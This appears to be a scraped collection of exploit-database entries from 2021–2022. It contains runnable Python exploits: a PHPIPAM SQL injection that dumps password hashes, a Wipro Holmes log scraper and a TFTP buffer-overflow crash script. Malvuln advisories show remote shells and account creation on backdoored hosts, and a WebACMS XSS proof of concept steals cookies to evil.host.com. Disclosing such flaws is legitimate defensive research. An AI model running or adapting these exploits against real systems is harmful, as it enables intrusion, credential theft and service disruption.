<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/4087cffab90fa22c2882e2f97a467e8e.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hanuman.b<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 3333. Third-party attackers who can reach an infected system can run any OS commands hijacking the compromised host. <br />Type: PE32<br />MD5: 4087cffab90fa22c2882e2f97a467e8e<br />Vuln ID: MVID-2022-0467 <br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 3333<br />Hanuman Server [DOS SHELL DAEMON]<br />WEB : www.junkcode.cjb.net<br /><br /> You are Client No. : 1<br /> Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS>whoami<br />whoami<br />desktop-2c4jqho\victim<br /><br />C:\WINDOWS>net user malvuln 13 /add<br />net user malvuln 13 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection<br /># Date: 20/11/2021<br /># Exploit Author: Ilker Burak ADIYAMAN<br /># Vendor Homepage: https://aimeos.org<br /># Software Link: https://aimeos.org/laravel-ecommerce-package<br /># Version: Aimeos 2021.10 LTS<br /># Tested on: MacOSX<br /><br />*Description:*<br /><br />The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.<br /><br />==================== 1. SQLi ====================<br /><br />https://127.0.0.1/default/jsonapi/review?sort=-ctime<br /><br />The "sort" parameter is vulnerable to SQL injection, reveals table and column names.<br /><br />step 1 : Copy json api GET request above.<br />step 2 : Change sort parameter value to --<br /><br />----------------------------------------------------------------------<br />Parameter: sort (GET)<br /> Type: error based<br /> Title: GET parameter 'sort' appears to be injectable<br /> Payload: sort=--<br /><br /></code></pre>
<pre><code>Advisory ID: TO-2021-001<br />Product: WebACMS<br />Vendor: AFI Solutions GmbH<br />Tested Version: 2.1.0<br />Fixed Version: -<br />Vulnerability Type: Cross-Site Scripting (CWE-79)<br />CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4)<br />CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1)<br />Solution Status: Unfixed<br />Manufacturer Notification: 2021-12-13<br />Solution Date: 2022-01-17<br />Public Disclosure: 2022-01-20<br />CVE Reference: CVE-2021-44829<br />Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The product "ACMS" of AFI Solutions GmbH [1] is a so called edi <br />converter. For<br />companies to be able to exchange arbitrary data it is common to use a edi<br />converter to convert between data formats of the sender and the recipient.<br />The product of AFI Solutions also incorporates a web interface, which is the<br />subject of this advisory.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />The index page has a parameter "ID" which is used to navigate within the web<br />application. It is not properly sanitized and will be rendered into the <br />login<br />form of the index page, as well. The vulnerable code will be shown from the<br />following listing:<br /><br /><FORM name=thisForm METHOD=post action="/index.html?id=1" target="_top"><br /> <table class="logintable"><br /> <tr><br /> <td width="110">Benutzername</td><br /> [.. truncated ..]<br /></form><br /><br />The parameter can be chosen from the actual url in the browser and thus is<br />unsanitized user controlled input. This makes the application vulnerable to<br />reflected Cross-Site Scripting. This vulnerability also applies to basically<br />all user controlled input after login. Also content returned by the database<br />is not properly sanitized before presentation, as well. Therefore the app is<br />also vulnerable to stored Cross-Site Scripting.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The following request will steal the applications insecure cookies using <br />this<br />vulnerablity.<br /><br />GET <br />/index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com<br /> /cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1<br />Host: vulnerable.host.com<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 <br />Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,<br /> image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: COMID=<br />Upgrade-Insecure-Requests: 1<br /><br />This will render to the following html code and trigger in a victims <br />browser.<br /><br /><FORM name=thisForm METHOD=post action="/index.html?id="><script><br />document.location='http://evil.host.com/cookies?'+document.cookie;</script><br /> <id="" target="_top"><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The user supplied data should be sanitized before using it to render a page.<br />Also database retrieved content should be sanitized before presenting it <br />to the<br />browser again.<br /><br />The vendor states that this software component was only used by the vendors<br />support and that it is not used actively anymore. The vendor recommends to<br />deactivate this component.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br />2021-12-10: Vulnerability discovered<br />2021-12-13: Vulnerability reported to manufacturer<br />2022-01-17: Solution provided by manufacturer<br />2022-01-20: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Vendor Website<br /> https://www.afi-solutions.com/<br />[2] Thinking Objects Security Advisory<br /> https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting<br />[3] Thinking Objects Responsible Disclosure Policy<br /> https://blog.to.com/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Patrick Hener and Siva Rajendran<br />of Thinking Objects GmbH.<br /><br />E-Mail: patrick.hener@to.com<br />Public Keys: https://to.com/pgp-keys<br />Key ID: 877756EA2CB50685<br />Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /><br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/d2b933ebadd5c808ca4c68ae173e2d62.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.ad<br />Vulnerability: Insecure Credential Storage<br />Description: The malware listens on TCP port 87, its default password "hoanggia" is stored in the Windows registry in cleartext under "clrprv.oo" in "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\System\NPP". The password is also set as cookie value "Cookie: pass=hoanggia; day=14; month=11; year=2021", which also gets sent over the network in plaintext. Third party attackers who can access the system or sniff traffic can grab the password, then execute any programs and or run commands made available by the backdoor.<br /><br />Execute programs<br />http://x.x.x.x:87/brow?exe=C:\Windows\system32\calc.exe<br /><br />Screenshots<br />http://x.x.x.x:87/scrs?<br /><br />Websites visited<br />http://x.x.x.x:87/web?<br /><br />Keys pressed<br />http://x.x.x.x:87/key?<br /><br />File system browsing<br />http://x.x.x.x:87/brow?<br /><br />Apps used<br />http://x.x.x.x:87/run?<br /><br />Outlook emails<br />http://x.x.x.x:87/chatoutlook?app=out<br /><br />Misc CMDs<br />http://x.x.x.x:87/main?cmd=shutdown<br />http://x.x.x.x:87/main?cmd=logoff<br />http://x.x.x.x:87/main?cmd=reboot<br /><br />Type: PE<br />MD5: d2b933ebadd5c808ca4c68ae173e2d62 <br />Vuln ID: MVID-2021-0406<br />Disclosure: 11/21/2021<br /><br /><br />Exploit/PoC:<br />import requests<br /><br />with requests.Session() as s:<br /> p = s.post("http://x.x.x.x:87/main", data={'pass':"hoanggia"})<br /> r = s.get("http://x.x.x.x:87/brow?exe=calc")<br /> print(r.status_code)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)<br /># Google Dork: [if applicable]<br /># Date: 20/01/2022<br /># Exploit Author: Rodolfo "Inc0gbyt3" Tavares<br /># Vendor Homepage: https://github.com/phpipam/phpipam<br /># Software Link: https://github.com/phpipam/phpipam<br /># Version: 1.4.4<br /># Tested on: Linux/Windows<br /># CVE : CVE-2022-23046<br /><br />import requests<br />import sys<br />import argparse<br /><br />################<br />"""<br />Author of exploit: Rodolfo 'Inc0gbyt3' Tavares<br />CVE: CVE-2022-23046<br />Type: SQL Injection<br /><br />Usage:<br /><br />$ python3 -m pip install requests<br />$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password><br />"""<br />###############<br /><br />__author__ = "Inc0gbyt3"<br /><br />menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")<br />menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)<br />menu.add_argument("-U", "--user", help="[+] Username", type=str)<br />menu.add_argument("-P", "--password", help="[+] Password", type=str)<br />args = menu.parse_args()<br /><br />if len(sys.argv) < 3:<br /> menu.print_help()<br /><br />target = args.url<br />user = args.user<br />password = args.password<br /><br /><br />def get_token():<br /> u = f"{target}/app/login/login_check.php"<br /><br /> try:<br /> r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})<br /> headers = r.headers['Set-Cookie']<br /> headers_string = headers.split(';')<br /> for s in headers_string:<br /> if "phpipam" in s and "," in s: # double same cookie Check LoL<br /> cookie = s.strip(',').lstrip()<br /> return cookie<br /> except Exception as e:<br /> print(f"[+] {e}")<br /><br /><br />def exploit_sqli():<br /> cookie = get_token()<br /> xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"<br /> data = {<br /> "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :)<br /> "bgp_id":1<br /> }<br /><br /> headers = {<br /> "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br /> "Cookie": cookie<br /> }<br /><br /> try:<br /> r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)<br /> if "admin" in r.text or "rounds" in r.text:<br /> print("[+] Vulnerable..\n\n")<br /> print(f"> Users and hash passwords: \n\n{r.text}")<br /> print("\n\n> DONE <")<br /> except Exception as e:<br /> print(f"[-] {e}")<br /><br /><br /><br />if __name__ == '__main__':<br /> exploit_sqli()<br /> <br /></code></pre>
<pre><code># Exploit Title: Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure<br /># Date: 09/08/2021<br /># Exploit Author: Rizal Muhammed @ub3rsick<br /># Vendor Homepage: https://www.wipro.com/holmes/<br /># Version: 20.4.1<br /># Tested on: Windows 10 x64<br /># CVE : CVE-2021-38283<br /><br />import requests as rq<br />import argparse<br />import datetime<br />import os<br />from calendar import monthrange<br />from multiprocessing.dummy import Pool as ThreadPool<br />from functools import partial<br /><br /># Change if running on different port<br />port = 8001<br /><br />log_list = [<br /> "AlertService.txt",<br /> "ApprovalService.txt",<br /> "AuditService.txt",<br /> "CustomerController.txt",<br /> "CustomerDomainCredentialService.txt",<br /> "CustomerFileService.txt",<br /> "CustomerService.txt",<br /> "DashboardController.txt",<br /> "DataParseService.txt",<br /> "DomainService.txt",<br /> "ExecutionService.txt",<br /> "ExternalAPIService.txt",<br /> "FilesController.txt",<br /> "FormService.txt",<br /> "InfrastructureService.txt",<br /> "ITSMConfigPrepService.txt",<br /> "LicenseService.txt",<br /> "LoginService.txt",<br /> "MailService.txt",<br /> "MasterdataController.txt",<br /> "NetworkService.txt",<br /> "OrchestrationPreparationService.txt",<br /> "ProblemInfrastructureService.txt",<br /> "ProcessExecutionService.txt",<br /> "ServiceRequestService.txt",<br /> "SolutionController.txt",<br /> "SolutionLiveService.txt",<br /> "SolutionService.txt",<br /> "StorageService.txt",<br /> "TaskService.txt",<br /> "TicketingService.txt",<br /> "UserController.txt",<br /> "UtilityService.txt"<br /><br />]<br /><br />def check_month(val):<br /> ival = int(val)<br /> if ival > 0 and ival < 13:<br /> return ival<br /> else:<br /> raise argparse.ArgumentTypeError("%s is not a valid month" % val)<br /><br />def check_year(val):<br /> iyear = int(val)<br /> if iyear >= 1960 and iyear <= datetime.date.today().year:<br /> return iyear<br /> else:<br /> raise argparse.ArgumentTypeError("%s is not a valid year" % val)<br /><br /><br />def do_request(target, date, log_file):<br /> log_url = "http://%s/log/%s/%s" % (target, date, log_file)<br /><br /> log_name = "%s_%s" % (date, log_file)<br /> print ("[*] Requesting Log: /log/%s/%s" % (date, log_file))<br /><br /> resp = rq.get(log_url)<br /><br /> if resp.status_code == 200 and not "Wipro Ltd." in resp.text:<br /> print ("[+] Success : %s" % log_url)<br /> #print (resp.text[0:150] + "\n<...snipped...>")<br /> with open("logs/%s" % log_name, 'w') as lf:<br /> lf.write(resp.text)<br /> lf.close()<br /> print ("[*] Log File Written to ./logs/%s" % (log_name))<br /><br />def main():<br /><br /> parser = argparse.ArgumentParser(<br /> description="Wipro Holmes Orchestrator 20.4.1 Unauthenticated Log File Disclosure",<br /> epilog="Vulnerability Discovery, PoC Author - Rizal Muhammed @ub3sick"<br /> )<br /><br /> parser.add_argument("-t","--target-ip", help="IP Address of the target server", required=True)<br /> parser.add_argument("-m","--month", help="Month of the log, (1=JAN, 2=FEB etc.)", required=True, type=check_month)<br /> parser.add_argument("-y","--year", help="year of the log", required=True, type=check_year)<br /> args = parser.parse_args()<br /><br /> ndays = monthrange(args.year, args.month)[1]<br /> date_list = ["%s" % datetime.date(args.year, args.month,day) for day in range(1,ndays+1,1)]<br /><br /> target = "%s:%s" % (args.target_ip, port)<br /><br /> # create folder "logs" to save log files, if does not exist<br /> if not os.path.exists("./logs"):<br /> os.makedirs("./logs")<br /><br /> for log_date in date_list:<br /> for log_file in log_list:<br /> do_request(target, log_date, log_file)<br /><br />if __name__ == "__main__":<br /> main()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP99<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on TCP port 1492. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Type: PE32<br />MD5: 09dd14d3988e08a56798b1480c55a5b0<br />Vuln ID: MVID-2022-0466<br />Dropped files: Windll16.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />nmap -n -Pn -b hackcity:@192.168.18.129:1492 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-17 16:29 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://hackcity:@192.168.18.129:1492<br />Connected:220-Serv-U FTP-Server v2.3b for WinSock ready...<br />220 0wn3d<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 16:29<br />Removed 21<br />Changed my mind about port 21<br />Discovered open port 80/tcp on 192.168.18.237<br />Removed 22<br />Changed my mind about port 22<br />Completed Bounce Scan at 16:29, 2.17s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 9.44 seconds <br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-19<br /># Vendor Homepage: http://www.ipuptime.net/<br /># Software Link : http://ipuptime.net/PinkieSetup.zip<br /># Tested Version: 2.15<br /># Vulnerability Type: Buffer Overflow (DoS) Remote<br /># Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: Pinkie 2.15 TFTP Remote Buffer Overflow<br /><br /># Steps to reproduce:<br /># 1. - Download and install Pinkie 2.15<br /># 2. - Start TFTP Server listening on port 69<br /># 3. - Run the Script from remote PC/IP<br /># 4. - Crashed<br /><br /><br />#!/usr/bin/env python3<br /><br />import socket<br /><br />sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)<br /><br />read = (<br /> #Request - read<br /> b'\x00\x01' #Static - opcode<br /> + b')' * 32768 + #String - source_file (mutant, size=32768, orig val: b'File.bin')<br /> b'\x00' #Delim - delim1<br /> b'netascii' #String - transfer_mode<br /> b'\x00' #Delim - delim2<br />)<br />sock.sendto(read, ('192.168.1.207', 69))<br />sock.recv(65535)<br /><br />sock.close()<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/09dd14d3988e08a56798b1480c55a5b0.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP99<br />Vulnerability: Authentication Bypass Race Condition<br />Description: The malware listens on TCP port 1492. Credentials are stored in cleartext in "Serv-u.ini" file under "C:\Program Files (x86)\My Paquet archive" with a blank password. Third-party attackers who can reach the system before a password has been set can logon by just supplying the username "HACKCITY".<br /><br />"Serv-u.ini"<br /><br />[USER=hackcity]<br />Password=<br />HomeDir=c:\<br />AlwaysAllowLogin=YES<br /><br />Type: PE32<br />MD5: 09dd14d3988e08a56798b1480c55a5b0<br />Vuln ID: MVID-2022-0465<br />Dropped files: Windll16.exe<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />telnet.exe x.x.x.x 1492<br />220-Serv-U FTP-Server v2.3b for WinSock ready...<br />220 0wn3d<br />230 User HACKCITY logged in <br />HELP <br />214- The following commands are recognized (* => unimplemented). <br />USER PORT RETR ALLO DELE SITE XMKD CDUP <br />PASS PASV STOR REST CWD STAT RMD XCUP <br />ACCT TYPE APPE RNFR XCWD HELP XRMD STOU <br />REIN STRU SMNT RNTO LIST NOOP PWD SIZE <br />QUIT MODE SYST ABOR NLST MKD XPWD MDTM <br />214 Serv-U, registered to: Data Case <br />SYST <br />215 UNIX Type: L8 <br />PASV <br />227 Entering Passive Mode (192,168,18,129,206,190) <br />STOR DOOM.exe <br />150 Opening ASCII mode data connection for DOOM.exe. <br />STOR DOOM.exe <br />226 Transfer complete - file DOOM.exe received successfully<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.129"<br />PORT=52926<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /> <br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/5494b78dcfaf16aa43b5dbd563dc5582.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.h<br />Vulnerability: Hardcoded Cleartext Password <br />Description: The malware listens on TCP port 7300 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "grish5800" is hardcoded within the executable. The malware is packed with UPX and exposes the cleartext credentials when decompressed.<br />Type: PE32<br />MD5: 5494b78dcfaf16aa43b5dbd563dc5582<br />Vuln ID: MVID-2021-0405<br />Dropped files: asphelp.exe<br />Disclosure: 11/21/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 7300<br /><br />login: grish5800<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#DOS<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\WINDOWS\system32>whoami<br />whoami<br />nt authority\system<br /><br />C:\WINDOWS\system32>net user MALVULN 666 /add<br />net user MALVULN 666 /add<br />The command completed successfully.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>